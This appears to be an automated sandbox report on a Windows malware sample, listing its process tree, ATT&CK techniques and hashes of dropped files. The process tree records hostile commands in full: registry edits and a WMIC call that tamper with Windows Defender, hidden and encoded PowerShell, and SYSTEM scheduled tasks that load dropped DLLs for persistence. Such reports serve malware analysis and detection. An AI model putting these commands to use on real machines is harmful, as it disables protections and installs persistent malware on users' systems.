C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5432
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5980
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3784

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5512

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe 0c /qdotdidNb 385118 /S
1⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3040
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5404
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:4676
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:2892
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5312
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:4084
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:1212
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:4020
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:2956
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5840
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:944
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5516
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:1008
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5912
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:4612
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:2088
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1664
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5424
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"
  2⤵
  PID:4628
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:2168
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:1396
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:2308
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2808
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5876
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\BRLoOE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5348
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\WCXnYbS.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:1572
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ucrVpivlTlXwlAC"
  2⤵
  PID:4544
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"
  2⤵
  PID:3016
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\vNnVqYX.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2820
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\sajTEfs.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5064
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\QTCNSRy.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2920
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\RLRPNdC.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6120
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 08:47:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\YoUqjagI\xuYtYBv.dll\",#1 /ROMbdidSQ 385118" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:5876
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"
  2⤵
  PID:836
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "hhewb1" /SC once /ST 02:51:13 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"
  2⤵
  - Creates scheduled task(s)
  PID:2844
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "hhewb1"
  2⤵
  PID:3872
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "hhewb1"
  2⤵
  PID:5248
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"
  2⤵
  PID:6004
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 2096
  2⤵
  - Program crash
  PID:5596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5648 -ip 5648
1⤵
PID:1784

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\YoUqjagI\xuYtYBv.dll",#1 /ROMbdidSQ 385118
1⤵
PID:3784
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\YoUqjagI\xuYtYBv.dll",#1 /ROMbdidSQ 385118
  2⤵
  PID:4856
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"
    3⤵
    PID:6136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session
1⤵
PID:5140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb09ff3cb8,0x7ffb09ff3cc8,0x7ffb09ff3cd8
  2⤵
  PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2
  2⤵
  PID:5096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 /prefetch:3
  2⤵
  PID:200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2972 /prefetch:8
  2⤵
  PID:3980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
  2⤵
  PID:5552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:5412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
  2⤵
  PID:5676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1
  2⤵
  PID:5500

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4628

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5072 -ip 5072
1⤵
PID:5504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3040 -ip 3040
1⤵
PID:2860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
2.0MB

MD5
619bfdec43a0c21c19330d0aa9da6141

SHA1
ff1a8a0f4aa32a0bbe4b4a4c09e380640bca17b6

SHA256
79ee19deee41f4c68a6f0fb08ad2b58a0e32b63f1477b00446ce763199ec955f

SHA512
f19dec74652eb7888533705d576ebb19d9289a78ec07b3bcec2cdf9e9e11a230e615bf8ca7a93425da5358929f1ed3e544f3e04be87f55811110cc5289133c42

Download Submit
C:\Users\Admin\1000004002\7ec52fcc46.exe

Filesize
1.9MB

MD5
e38381d97120484d6222043615517eb3

SHA1
26113dc47fd2a46de7133aeb1f4491ad0c2037e4

SHA256
1ea19d27a96fde8c92fade71c70d3c7dcb9a75d070d6d400d6eda8c2a5a6babe

SHA512
4f04bef4b67e0b270062147cac23b27480a9a625c0990527d5ac83b58330cf30925138d0ecb96cff4e76109d3c51324be55cf487e34dac467a9e9ebf059498fa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
4709a3d8f14b13241fa0d959fbc80876

SHA1
490056b573e2d6092f462a3f8cb3fcb84f154301

SHA256
2a672d856295702ae21958009f1edc5d0ba85b61a002f1475e0d11c4655f4561

SHA512
11b2cff61d0d49aa2cd782d0260f4e2331764c393a624cff95150661c3ff9fb0ad2ff7bcab93e031e21c56b8eabfbb9cb4b5fcab07b440cab339120fc51998f1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
35KB

MD5
d4a912e0ee242f7cee43f1208a3c8c6d

SHA1
4dd9e54549e2e74dfa14f56f060a08c4bee23bbc

SHA256
a26e1fd8781182a6f97ce372c3c7402257f9af8217b111d056777bfdf4f8fe14

SHA512
5db4726422268955538afb303d19568cbefa918018c2c7c0bfe2e29c27a43b127fef4c28df095aada1a9256fe197f4169235eb25d1655fc7fb26a90dadef3a92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0c705388d79c00418e5c1751159353e3

SHA1
aaeafebce5483626ef82813d286511c1f353f861

SHA256
697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d

SHA512
c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0d84d1490aa9f725b68407eab8f0030e

SHA1
83964574467b7422e160af34ef024d1821d6d1c3

SHA256
40c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e

SHA512
f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
bfefed9bff280f46e0ed9c6d30c449ae

SHA1
d1473fce0a62189e7f0920ff4e271135f24087e2

SHA256
ff58209d301701501415e1fe45b3f57125b2bd875386c99ef0b5b06d238cebba

SHA512
c532fcb860556dc75044623cb18d61c3f7653b71ac72b91c17aef8cacc144e959d25254dbd32aa7e2f840198353fd212305f24a6e987cc225e1f6a807dba1a9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
336B

MD5
67df09705539dab3035f43ce273e3296

SHA1
90a887f9cb1fa9c539a1c10a7f7dfcc11e66f220

SHA256
8cfa57599b4a76375d381932ea8a7028ec30494ae1563a9ecc337ff9b66679de

SHA512
39d9e8d626ea612a87d8e73051d5b7e6ade5162d72fb24f12c4a6bca192b4746ec8a4d71f6b33696ba6b4824aa0da37fc6a2acaf1c187a9c4a7a3b3392693573

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

Filesize
151B

MD5
bd6b60b18aee6aaeb83b35c68fb48d88

SHA1
9b977a5fbf606d1104894e025e51ac28b56137c3

SHA256
b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

SHA512
3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
940f5df4cd8d5a214198767c3bd2bad6

SHA1
de5888804357ae033ef75cee371c445e48a158d1

SHA256
20ff572b91587f802e6190277673d25a9ebe52a584c09cf0a07f0bba4bfc4edf

SHA512
1c3bbf87907a6f9eedbd1d729e858c75c714e2c7e69ca8a0f1c897ef1e48916239f6ab6f86018808201fc145b2c4a3040f58773b75bae25ae71eef3ad9aee483

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
6bf56baf0280c62c2f8948d576a14c5c

SHA1
5cd061f2b1e542a275fe7a58f20bce9864cee3fb

SHA256
eb64e14293241f646e0a41a3e629064b2b2721c2b19b169fa0ac12fe601317ab

SHA512
3bb41e8f1bd97c9ce982e9ee73cfd4c97e47ca9c4ed9c2bd8540bf69e53f6c52fcfc3f37ea15727004f37c6c4969c57435b80042d0f9e7fa4b589dd41191ef58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
1b7230d7f9cfab5f263434e0afeae3fa

SHA1
90e80511427d50def6811a8c499858b62e7a0390

SHA256
225248ef362f91d0c7e86327335e3216d13b683b963a421f8d2eb83f5dde3a7a

SHA512
4d600dc5eb5d49cecf1cb2d12d6df6d1984303f63af5089433e6527a8a6fc6b0bdf441a45517c5442de733078254bd6363290a50bb722c373ee8b2cdc8007072

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
35KB

MD5
ab826a905d77d3e23a545d55464e004d

SHA1
70956ccec33f7c9ac2cb0955dc00c428c4c031fc

SHA256
787345f3c951d0e276098d69327a88b13f59cef132497878021d3ebd285fe741

SHA512
17b9b109b47289b0b0861f585091f65271a4af4b211e5833f61c11f8bdec5027579f86fd61ffe249381d53b4aa53f20f72b78c4154664c2b02fc0f6159ed7cae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
a724fc861874ee09962885e5979ae51b

SHA1
962513b9afc97ae42ce0655a84bde2424b77bc98

SHA256
26de69f343630056b79798533c767ef54ea2babfa6802028fb138454304cb17b

SHA512
79c27f8b758e6139128fd4392b786591ee8ba238081ac24650af93ec7e432e69dc6236648da6e8cb732733f5b905577c3c822eea4620d41a74cd9775e0678c9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
fcc6ff235c86baedaacfdf8bef00d821

SHA1
f7665d242af03125e86b90a0d97d4e377aafceeb

SHA256
2d207e6eba5f4dd3354c70fc9336b6ecf149551c5aa1823367e6c36090e80f6f

SHA512
67d75ec1eee6c8920fcbd0af40b304306b6979bfe780bba0d9a4885ac08b14cac57f36353fe72d720e8646224edc18753e72a2f39377398d758038b000f4543c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Accredited

Filesize
39KB

MD5
acca19dc2ccc50994258a816e8c31439

SHA1
40ccf9dab204569cef118dd200d3fe90f21b3a63

SHA256
e289f94b916861fd796ec001f718bc9502103747738d524827d76aba188b5242

SHA512
c00e1b9dc0adf7539bbb3a86462492f77865fc82f29a2f1cff472fc2a7684c8b73e76cadf6f048423928d00a3555120a487d3600b57ccdf3ef8618a787ae27c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Albany

Filesize
26KB

MD5
7290b064b7211ee58263434e7f3e5d06

SHA1
fabad9d3bcac72a0157daebc4d97441b15125a02

SHA256
4d3e9e90746157d6e091a3362f179641f73051fa4f8055c2af1e088584a508dc

SHA512
059a3f07ddd21eb50b60a83aea1eb4f446ec9b358d57a41259adb30038dfa38bbf5e5cb8d2b1baeb525f42bf9543d509d704629b924305358f6fb5b1097fb792

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Basic

Filesize
50KB

MD5
d9be996166f9ef2572c6719e3ebf721e

SHA1
bd889e733d046ddfebe63bb7420c8c75311c0c61

SHA256
d345c73a3e73677254467bf11c977656adf50eb12af2c1066be971d028417105

SHA512
405adef1992f11bd9f28609ad8012f38b6bc2c3bbc855b63bc3fd016966c52ec44f4c52ec2746ac72c376a05b056ae3a8a6986448551c3b6ce1def7c8b6ab5b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Botswana

Filesize
64KB

MD5
72daa9860999eb0c7ab8729e5b7e1222

SHA1
23680f2c8a9341aa62e1d22c905f8404da7a06ea

SHA256
9ab45d6a0a920e937fef6e53ffba2c66c9e66ec7bf858d907091b95e7a6bfb2d

SHA512
